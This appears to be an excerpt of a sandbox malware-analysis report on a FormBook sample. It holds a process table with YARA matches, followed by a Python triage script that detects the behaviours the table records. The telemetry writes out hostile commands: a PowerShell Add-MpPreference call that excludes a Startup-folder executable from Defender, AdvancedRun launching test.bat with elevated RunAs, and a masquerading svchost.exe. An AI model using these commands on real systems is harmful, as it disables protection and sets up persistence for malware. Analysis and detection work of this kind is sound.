                                                                                      General

                                                                                      Start time:08:54:09
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff693d90000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                      General

                                                                                      Start time:08:54:09
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:11
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                                                                                      Imagebase:0x1170000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:11
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                                                                                      Imagebase:0x670000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:54:15
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:19
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x7ff6bbfa0000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      General

                                                                                      Start time:08:54:21
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                                                                                      Imagebase:0x1170000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:23
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:26
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:27
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      General

                                                                                      Start time:08:54:29
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:29
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:32
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:54:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:54:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
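
The process table above contains, as raw telemetry, the three behaviours the report's signatures name: a file called svchost.exe started from C:\Users\Public\Documents\2FDD6624\ rather than System32, powershell.exe adding a Defender exclusion for a file in the user's Startup folder, and the dropped NirSoft AdvancedRun.exe launching test.bat with /RunAs. The following Python triage filter is an added example, not code from the Joe Sandbox report or from the sample; it replays process-creation records constructed from the entries above (the record fields start, path and cmdline and the rule names are assumptions, not a real log schema) and returns one finding per matching behaviour, so the same logic can be pointed at Sysmon or 4688 exports with a small field mapping.

```python
"""Added triage example (not code from the Joe Sandbox report or the sample).

Replays process-creation records shaped like this report's process table and
flags the behaviours the report's signatures describe.  The record schema
(start, path, cmdline) and the rule names are assumptions for illustration.
"""
import ntpath
import re
from typing import List, Optional, Tuple

# Only these directories may legitimately host the listed system binaries.
ALLOWED_SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_BINARY_NAMES = {"svchost.exe", "conhost.exe", "werfault.exe", "lsass.exe", "csrss.exe"}

# Add-MpPreference -ExclusionPath '<path>' as it appears in the powershell.exe lines.
EXCLUSION_RE = re.compile(r"add-mppreference\s.*?-exclusionpath\s+'([^']+)'", re.IGNORECASE)
# NirSoft AdvancedRun switches seen in the report: /EXEFilename '<file>' ... /RunAs <n>
EXEFILENAME_RE = re.compile(r"/exefilename\s+'([^']+)'", re.IGNORECASE)
RUNAS_RE = re.compile(r"/runas\s+(\d+)", re.IGNORECASE)
STARTUP_MARK = "\\start menu\\programs\\startup\\"


def masquerading_system_binary(path: str) -> bool:
    """True when the image name is a well-known Windows binary but the image is
    not loaded from System32/SysWOW64 (report: 'System File Execution Location
    Anomaly', 'Drops PE files with benign system names')."""
    path = path.strip("'\"")
    directory = ntpath.dirname(path).lower()
    name = ntpath.basename(path).lower()
    return name in SYSTEM_BINARY_NAMES and directory not in ALLOWED_SYSTEM_DIRS


def defender_exclusions(cmdline: str) -> List[str]:
    """Paths a command line passes to Add-MpPreference -ExclusionPath."""
    return [m.group(1) for m in EXCLUSION_RE.finditer(cmdline)]


def advancedrun_target(cmdline: str) -> Optional[Tuple[int, Optional[str]]]:
    """(runas_level, target) for an AdvancedRun.exe launch that uses /RunAs.
    The follow-up '/SpecialRun' child has no /RunAs and returns None."""
    if "advancedrun.exe" not in cmdline.lower():
        return None
    runas = RUNAS_RE.search(cmdline)
    if runas is None:
        return None
    exe = EXEFILENAME_RE.search(cmdline)
    return int(runas.group(1)), (exe.group(1) if exe else None)


def in_startup_folder(path: str) -> bool:
    return STARTUP_MARK in path.lower()


def triage(records) -> List[Tuple[str, str, str]]:
    """Return (rule, start_time, detail) findings for the given records."""
    findings = []
    for rec in records:
        path, cmd, start = rec["path"], rec["cmdline"], rec["start"]
        if masquerading_system_binary(path):
            findings.append(("system_binary_outside_system32", start, path))
        for excl in defender_exclusions(cmd):
            rule = "defender_exclusion_in_startup" if in_startup_folder(excl) else "defender_exclusion"
            findings.append((rule, start, excl))
        hit = advancedrun_target(cmd)
        if hit is not None:
            findings.append(("advancedrun_runas", start, f"runas={hit[0]} target={hit[1]}"))
    return findings


# Constructed from the report's process table (start time, path, command line).
SAMPLE_RECORDS = [
    {"start": "08:54:09", "path": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k WerSvcGroup"},
    {"start": "08:54:11", "path": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328"},
    {"start": "08:54:11", "path": r"C:\Users\Public\Documents\2FDD6624\svchost.exe",
     "cmdline": r"'C:\Users\Public\Documents\2FDD6624\svchost.exe'"},
    {"start": "08:54:19", "path": r"C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe",
     "cmdline": r"'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run"},
    {"start": "08:54:26", "path": r"C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe",
     "cmdline": r"'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132"},
    {"start": "08:54:34", "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force"},
    {"start": "08:54:34", "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

if __name__ == "__main__":
    for rule, start, detail in triage(SAMPLE_RECORDS):
        print(f"{start}  {rule:32s}  {detail}")
```

Run as-is, the filter reports exactly three findings for the seven records: the svchost.exe copy under Public\Documents, the AdvancedRun launch of test.bat with /RunAs 8, and the Defender exclusion for 36C95A71.exe in the Startup folder; the legitimate System32/SysWOW64 processes and the /SpecialRun child produce nothing. The masquerade check compares the parent directory, not just the image name, because the report's two svchost.exe entries differ only in that field, and the exclusion rule is split into a Startup-folder variant since an exclusion on a persistence location is the stronger signal.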

                                                                                      Disassembly

                                                                                      Code Analysis
